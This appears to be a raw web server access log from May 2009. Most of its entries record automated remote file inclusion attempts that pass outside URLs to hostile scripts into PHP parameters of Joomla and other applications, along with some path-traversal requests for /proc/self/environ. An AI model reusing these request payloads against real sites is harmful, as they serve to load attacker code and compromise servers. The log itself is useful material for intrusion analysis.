94.229.68.219 - - [20/May/2009:09:39:09 -0700] "GET /logs/access_081008.log%20%20//index.php?DOCUMENT_ROOT=http://billiardshow.de/components/com_content/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
62.44.79.35 - - [20/May/2009:09:39:24 -0700] "GET /logs/access_081201.log//naboard_pnr.php?skin=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
62.44.79.35 - - [20/May/2009:09:39:24 -0700] "GET /naboard_pnr.php?skin=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
62.44.79.35 - - [20/May/2009:09:39:24 -0700] "GET /logs//naboard_pnr.php?skin=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
85.214.24.22 - - [20/May/2009:09:39:28 -0700] "GET /logs/access_080111.log/mvcw.php?step=1&vwar_root=http://www.ambient-arts.co.uk/media/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.24.22 - - [20/May/2009:09:39:28 -0700] "GET /mvcw.php?step=1&vwar_root=http://www.ambient-arts.co.uk/media/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.24.22 - - [20/May/2009:09:39:28 -0700] "GET /logs/mvcw.php?step=1&vwar_root=http://www.ambient-arts.co.uk/media/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
218.249.36.194 - - [20/May/2009:09:39:29 -0700] "GET /config.php?path_to_root=http://chicken.ucoz.org/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.249.36.194 - - [20/May/2009:09:39:29 -0700] "GET /logs/access_080213.log%20%20/config.php?path_to_root=http://chicken.ucoz.org/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.249.36.194 - - [20/May/2009:09:39:32 -0700] "GET /logs/config.php?path_to_root=http://chicken.ucoz.org/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
94.229.68.219 - - [20/May/2009:09:39:32 -0700] "GET /logs/access_081209.log%20%20/index.php?menu=deti&page=http://billiardshow.de/components/com_content/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
94.229.68.219 - - [20/May/2009:09:39:32 -0700] "GET /logs/index.php?menu=deti&page=http://billiardshow.de/components/com_content/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
94.229.68.219 - - [20/May/2009:09:39:32 -0700] "GET /logs/access_080514.log%20%20/index.php?menu=deti&page=http://billiardshow.de/components/com_content/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
62.44.79.35 - - [20/May/2009:09:39:34 -0700] "GET /logs/access_081108.log//naboard_pnr.php?skin=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
94.229.68.219 - - [20/May/2009:09:39:38 -0700] "GET /includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://billiardshow.de/components/com_content/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
94.229.68.219 - - [20/May/2009:09:39:38 -0700] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://billiardshow.de/components/com_content/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
94.229.68.219 - - [20/May/2009:09:39:38 -0700] "GET /logs/access_080426.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://billiardshow.de/components/com_content/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.249.36.194 - - [20/May/2009:09:39:39 -0700] "GET /logs/access_080428.log%20%20/config.php?path_to_root=http://chicken.ucoz.org/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
85.214.24.22 - - [20/May/2009:09:39:41 -0700] "GET /logs/access_080127.log/mvcw.php?step=1&vwar_root=http://www.ambient-arts.co.uk/media/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
94.229.68.219 - - [20/May/2009:09:39:50 -0700] "GET /logs/access_080731.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://billiardshow.de/components/com_content/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.157.4.41 - - [20/May/2009:09:39:52 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/20090418.gpx HTTP/1.0" 200 727834 "-" "-" "www.dmulk.com"
62.44.79.35 - - [20/May/2009:09:40:02 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.rainbowofdiamonds.com/scripts/test?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.dmulk.com"
62.44.79.35 - - [20/May/2009:09:40:03 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.rainbowofdiamonds.com/scripts/test?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.dmulk.com"
218.249.36.194 - - [20/May/2009:09:40:05 -0700] "GET /logs/access_080213.log/config.php?path_to_root=http://chicken.ucoz.org/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.157.4.41 - - [20/May/2009:09:40:07 -0700] "GET /blog/wp-content/gallery/2009-04-12-crestlineadv/04122009bigbearDS.gpx HTTP/1.0" 200 1068632 "-" "-" "www.dmulk.com"
212.150.52.114 - - [20/May/2009:09:40:10 -0700] "GET /logs/access_080717.log%20%20//mindmeld/acweb/admin_index.php?MM_GLOBALS[home]=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.249.36.194 - - [20/May/2009:09:40:16 -0700] "GET /logs/access_080428.log/config.php?path_to_root=http://chicken.ucoz.org/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
85.214.24.22 - - [20/May/2009:09:40:19 -0700] "GET /logs/mvcw.php?step=1&vwar_root=http://www.ambient-arts.co.uk/media/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.24.22 - - [20/May/2009:09:40:19 -0700] "GET /mvcw.php?step=1&vwar_root=http://www.ambient-arts.co.uk/media/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
94.229.68.219 - - [20/May/2009:09:40:31 -0700] "GET /index.php?menu=deti&page=http://billiardshow.de/components/com_content/id.txt??? HTTP/1.1" 200 41967 "-" "Mozilla/5.0" "www.dmulk.com"
67.43.0.140 - - [20/May/2009:09:40:46 -0700] "GET /logs/access_081201.log//naboard_pnr.php?skin=http://www.clancombatboots.net/files/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.43.0.140 - - [20/May/2009:09:40:49 -0700] "GET /logs/access_081201.log//naboard_pnr.php?skin=http://www.clancombatboots.net/files/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.43.0.140 - - [20/May/2009:09:40:54 -0700] "GET /logs/access_081108.log//naboard_pnr.php?skin=http://www.clancombatboots.net/files/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.43.0.140 - - [20/May/2009:09:40:56 -0700] "GET /logs/access_081108.log//naboard_pnr.php?skin=http://www.clancombatboots.net/files/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
216.129.119.47 - - [20/May/2009:09:40:57 -0700] "GET /blog/index.php/page/2/?show=slide&pageid=17&nggpage=3 HTTP/1.0" 200 34130 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)" "dmulk.com"
61.81.93.2 - - [20/May/2009:09:41:00 -0700] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.qdgymx.com/website/administrator/components/com_remository/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
61.81.93.2 - - [20/May/2009:09:41:00 -0700] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.qdgymx.com/website/administrator/components/com_remository/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
61.81.93.2 - - [20/May/2009:09:41:00 -0700] "GET /logs/access_080520.log/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.qdgymx.com/website/administrator/components/com_remository/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
61.81.93.2 - - [20/May/2009:09:41:02 -0700] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.qdgymx.com/website/administrator/components/com_remository/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
61.81.93.2 - - [20/May/2009:09:41:02 -0700] "GET /logs/access_080520.log/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.qdgymx.com/website/administrator/components/com_remository/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
61.81.93.2 - - [20/May/2009:09:41:02 -0700] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.qdgymx.com/website/administrator/components/com_remository/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
61.81.93.2 - - [20/May/2009:09:41:02 -0700] "GET /logs/access_080520.log/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.qdgymx.com/website/administrator/components/com_remository/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
61.81.93.2 - - [20/May/2009:09:41:02 -0700] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.qdgymx.com/website/administrator/components/com_remository/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
94.229.68.219 - - [20/May/2009:09:41:02 -0700] "GET /logs/access_080514.log/index.php?menu=deti&page=http://billiardshow.de/components/com_content/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
94.229.68.219 - - [20/May/2009:09:41:02 -0700] "GET /logs/access_081209.log/index.php?menu=deti&page=http://billiardshow.de/components/com_content/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
61.81.93.2 - - [20/May/2009:09:41:02 -0700] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.qdgymx.com/website/administrator/components/com_remository/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
200.93.147.154 - - [20/May/2009:09:41:04 -0700] "GET /logs/errors.php?error=http://h1.ripway.com/luna121/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
200.93.147.154 - - [20/May/2009:09:41:04 -0700] "GET /logs/access_090508.log/errors.php?error=http://h1.ripway.com/luna121/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
200.93.147.154 - - [20/May/2009:09:41:04 -0700] "GET /errors.php?error=http://h1.ripway.com/luna121/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
61.81.93.2 - - [20/May/2009:09:41:04 -0700] "GET /logs/access_080807.log/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.qdgymx.com/website/administrator/components/com_remository/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
61.81.93.2 - - [20/May/2009:09:41:06 -0700] "GET /logs/access_080807.log/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.qdgymx.com/website/administrator/components/com_remository/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
61.81.93.2 - - [20/May/2009:09:41:06 -0700] "GET /logs/access_080807.log/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.qdgymx.com/website/administrator/components/com_remository/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
212.150.52.114 - - [20/May/2009:09:41:16 -0700] "GET /logs/access_080717.log%20%20//mindmeld/acweb/admin_index.php?MM_GLOBALS[home]=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
173.15.28.165 - - [20/May/2009:09:41:18 -0700] "GET /logs/index2.php?nav=http://www.rotaryamazonia.com/galeria2/drivid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
173.15.28.165 - - [20/May/2009:09:41:18 -0700] "GET /logs/access_080924.log/index2.php?nav=http://www.rotaryamazonia.com/galeria2/drivid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
173.15.28.165 - - [20/May/2009:09:41:18 -0700] "GET /index2.php?nav=http://www.rotaryamazonia.com/galeria2/drivid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
218.249.36.194 - - [20/May/2009:09:41:22 -0700] "GET /config.php?path_to_root=http://chicken.ucoz.org/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.249.36.194 - - [20/May/2009:09:41:22 -0700] "GET /logs/config.php?path_to_root=http://chicken.ucoz.org/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.249.36.194 - - [20/May/2009:09:41:22 -0700] "GET /logs/access_080213.log/config.php?path_to_root=http://chicken.ucoz.org/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.249.36.194 - - [20/May/2009:09:41:32 -0700] "GET /logs/access_080428.log/config.php?path_to_root=http://chicken.ucoz.org/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
173.15.28.165 - - [20/May/2009:09:41:33 -0700] "GET /logs/access_080501.log/index2.php?nav=http://www.rotaryamazonia.com/galeria2/drivid.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.93.147.154 - - [20/May/2009:09:41:39 -0700] "GET /logs/access_080515.log%20%20/errors.php?error=http://h1.ripway.com/roni121/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
200.93.147.154 - - [20/May/2009:09:41:40 -0700] "GET /errors.php?error=http://h1.ripway.com/roni121/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
200.93.147.154 - - [20/May/2009:09:41:43 -0700] "GET /logs/errors.php?error=http://h1.ripway.com/roni121/id1.txt?? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.27.203.107 - - [20/May/2009:09:41:56 -0700] "GET /logs//modules/global/inc/content.inc.php?sIncPath=http://livingfaithlutheran.com//snippetmaster/includes/tar_lib/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.27.203.107 - - [20/May/2009:09:41:56 -0700] "GET /modules/global/inc/content.inc.php?sIncPath=http://livingfaithlutheran.com//snippetmaster/includes/tar_lib/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.27.203.107 - - [20/May/2009:09:41:56 -0700] "GET /logs/access_080720.log//modules/global/inc/content.inc.php?sIncPath=http://livingfaithlutheran.com//snippetmaster/includes/tar_lib/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.27.203.107 - - [20/May/2009:09:41:57 -0700] "GET /logs/access_080817.log//modules/global/inc/content.inc.php?sIncPath=http://livingfaithlutheran.com//snippetmaster/includes/tar_lib/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.27.203.107 - - [20/May/2009:09:42:02 -0700] "GET /logs//modules/global/inc/content.inc.php?sIncPath=http://livingfaithlutheran.com//snippetmaster/includes/tar_lib/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.27.203.107 - - [20/May/2009:09:42:02 -0700] "GET /logs/access_080720.log//modules/global/inc/content.inc.php?sIncPath=http://livingfaithlutheran.com//snippetmaster/includes/tar_lib/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.27.203.107 - - [20/May/2009:09:42:02 -0700] "GET /modules/global/inc/content.inc.php?sIncPath=http://livingfaithlutheran.com//snippetmaster/includes/tar_lib/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.27.203.107 - - [20/May/2009:09:42:06 -0700] "GET /logs/access_080817.log//modules/global/inc/content.inc.php?sIncPath=http://livingfaithlutheran.com//snippetmaster/includes/tar_lib/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
190.144.44.36 - - [20/May/2009:09:42:07 -0700] "GET /logs/access_081205.log//skin/zero_vote/login.php?dir=http://dolphinplugins.com/wall/thumbs/v5.1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
190.144.44.36 - - [20/May/2009:09:42:13 -0700] "GET /logs/access_090307.log//skin/zero_vote/login.php?dir=http://dolphinplugins.com/wall/thumbs/v5.1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
61.81.93.2 - - [20/May/2009:09:42:18 -0700] "GET /logs/access_080520.log%20%20/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.qdgymx.com/website/administrator/components/com_remository/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.27.203.107 - - [20/May/2009:09:42:20 -0700] "GET /modules/global/inc/content.inc.php?sIncPath=http://livingfaithlutheran.com//snippetmaster/includes/tar_lib/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
61.81.93.2 - - [20/May/2009:09:42:22 -0700] "GET /logs/access_080520.log%20%20/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.qdgymx.com/website/administrator/components/com_remository/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.27.203.107 - - [20/May/2009:09:42:22 -0700] "GET /logs/access_080817.log%20%20//modules/global/inc/content.inc.php?sIncPath=http://livingfaithlutheran.com//snippetmaster/includes/tar_lib/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.27.203.107 - - [20/May/2009:09:42:22 -0700] "GET /logs//modules/global/inc/content.inc.php?sIncPath=http://livingfaithlutheran.com//snippetmaster/includes/tar_lib/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.27.203.107 - - [20/May/2009:09:42:22 -0700] "GET /logs/access_080720.log%20%20//modules/global/inc/content.inc.php?sIncPath=http://livingfaithlutheran.com//snippetmaster/includes/tar_lib/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
61.81.93.2 - - [20/May/2009:09:42:24 -0700] "GET /logs/access_080630.log%20%20/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.qdgymx.com/website/administrator/components/com_remository/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
61.81.93.2 - - [20/May/2009:09:42:27 -0700] "GET /logs/access_080520.log%20%20/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.qdgymx.com/website/administrator/components/com_remository/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
200.93.147.154 - - [20/May/2009:09:42:33 -0700] "GET /logs/access_081209.log%20%20/errors.php?error=http://h1.ripway.com/roni121/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
222.122.26.5 - - [20/May/2009:09:42:34 -0700] "GET /export.php?mosConfig_absolute_path=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
222.122.26.5 - - [20/May/2009:09:42:34 -0700] "GET /logs/export.php?mosConfig_absolute_path=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
222.122.26.5 - - [20/May/2009:09:42:34 -0700] "GET /logs/access_081105.log/export.php?mosConfig_absolute_path=http://www.wizard.com.br/fx29id.txt?? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
94.229.68.219 - - [20/May/2009:09:42:43 -0700] "GET /logs/access_080426.log%20%20//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://billiardshow.de/components/com_content/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
61.81.93.2 - - [20/May/2009:09:42:43 -0700] "GET /logs/access_080630.log%20%20/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.qdgymx.com/website/administrator/components/com_remository/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
94.229.68.219 - - [20/May/2009:09:42:44 -0700] "GET /logs/access_080731.log%20%20//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://billiardshow.de/components/com_content/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
174.34.129.58 - - [20/May/2009:09:43:16 -0700] "GET /logs/access_080924.log/index2.php?nav=http://www.rotaryamazonia.com/galeria2/drivid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.820" "www.dmulk.com"
174.34.129.58 - - [20/May/2009:09:43:16 -0700] "GET /index2.php?nav=http://www.rotaryamazonia.com/galeria2/drivid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.820" "www.dmulk.com"
174.34.129.58 - - [20/May/2009:09:43:16 -0700] "GET /logs/index2.php?nav=http://www.rotaryamazonia.com/galeria2/drivid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.820" "www.dmulk.com"
174.34.129.58 - - [20/May/2009:09:43:30 -0700] "GET /logs/access_080501.log/index2.php?nav=http://www.rotaryamazonia.com/galeria2/drivid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.820" "www.dmulk.com"
218.1.64.133 - - [20/May/2009:09:43:41 -0700] "GET /logs/access_080703.log//index.php/?mosConfig_absolute_path=http://www.longbeachphotosbc.ca/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
218.1.64.133 - - [20/May/2009:09:43:41 -0700] "GET /logs//index.php/?mosConfig_absolute_path=http://www.longbeachphotosbc.ca/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
218.1.64.133 - - [20/May/2009:09:43:42 -0700] "GET /logs/access_080703.log/errors.php?error=http://www.longbeachphotosbc.ca/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.dmulk.com"
218.1.64.133 - - [20/May/2009:09:43:42 -0700] "GET /logs/errors.php?error=http://www.longbeachphotosbc.ca/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.dmulk.com"
218.1.64.133 - - [20/May/2009:09:43:42 -0700] "GET /logs/access_080703.log//index.php/?mosConfig_absolute_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 275 "-" "XXXXXX" "www.dmulk.com"
218.1.64.133 - - [20/May/2009:09:43:42 -0700] "GET /logs//index.php/?mosConfig_absolute_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 275 "-" "XXXXXX" "www.dmulk.com"
218.1.64.133 - - [20/May/2009:09:43:42 -0700] "GET /logs/access_080703.log//index.php/?mosConfig_absolute_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "XXXXXX" "www.dmulk.com"
218.1.64.133 - - [20/May/2009:09:43:43 -0700] "GET /logs//index.php/?mosConfig_absolute_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "XXXXXX" "www.dmulk.com"
218.1.64.133 - - [20/May/2009:09:43:44 -0700] "GET /logs/access_080719.log//index.php/?mosConfig_absolute_path=http://www.longbeachphotosbc.ca/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
218.1.64.133 - - [20/May/2009:09:43:48 -0700] "GET /logs/access_080719.log/errors.php?error=http://www.longbeachphotosbc.ca/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.dmulk.com"
218.1.64.133 - - [20/May/2009:09:43:48 -0700] "GET /logs/access_080719.log//index.php/?mosConfig_absolute_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 275 "-" "XXXXXX" "www.dmulk.com"
218.1.64.133 - - [20/May/2009:09:43:49 -0700] "GET /logs/access_080719.log//index.php/?mosConfig_absolute_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "XXXXXX" "www.dmulk.com"
218.1.64.133 - - [20/May/2009:09:43:57 -0700] "GET /errors.php?error=http://www.longbeachphotosbc.ca/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.dmulk.com"
94.229.68.219 - - [20/May/2009:09:44:02 -0700] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://billiardshow.de/components/com_content/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
94.229.68.219 - - [20/May/2009:09:44:02 -0700] "GET /logs/access_081123.log%20%20//faqsupport/samplefaqsupport.php?path[docroot]=http://billiardshow.de/components/com_content/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
94.229.68.219 - - [20/May/2009:09:44:02 -0700] "GET /faqsupport/samplefaqsupport.php?path[docroot]=http://billiardshow.de/components/com_content/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.157.4.42 - - [20/May/2009:09:44:05 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/20090418.gpx HTTP/1.0" 200 727834 "-" "-" "www.dmulk.com"
163.24.136.10 - - [20/May/2009:09:44:11 -0700] "GET /logs/access_080925.log%20%20//include/bbs.lib.inc.php?site_path=http://www.monkeyinktattoos.com//modules/xcgal/albums/userpics/10001/black/fx29id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
163.24.136.10 - - [20/May/2009:09:44:15 -0700] "GET /logs/access_080619.log%20%20//include/bbs.lib.inc.php?site_path=http://www.monkeyinktattoos.com//modules/xcgal/albums/userpics/10001/black/fx29id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
91.121.210.42 - - [20/May/2009:09:44:18 -0700] "GET /logs/access_071223.log/modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
91.121.210.42 - - [20/May/2009:09:44:18 -0700] "GET /logs/modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
91.121.210.42 - - [20/May/2009:09:44:18 -0700] "GET /modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
91.121.210.42 - - [20/May/2009:09:44:21 -0700] "GET /modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
91.121.210.42 - - [20/May/2009:09:44:21 -0700] "GET /logs/modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
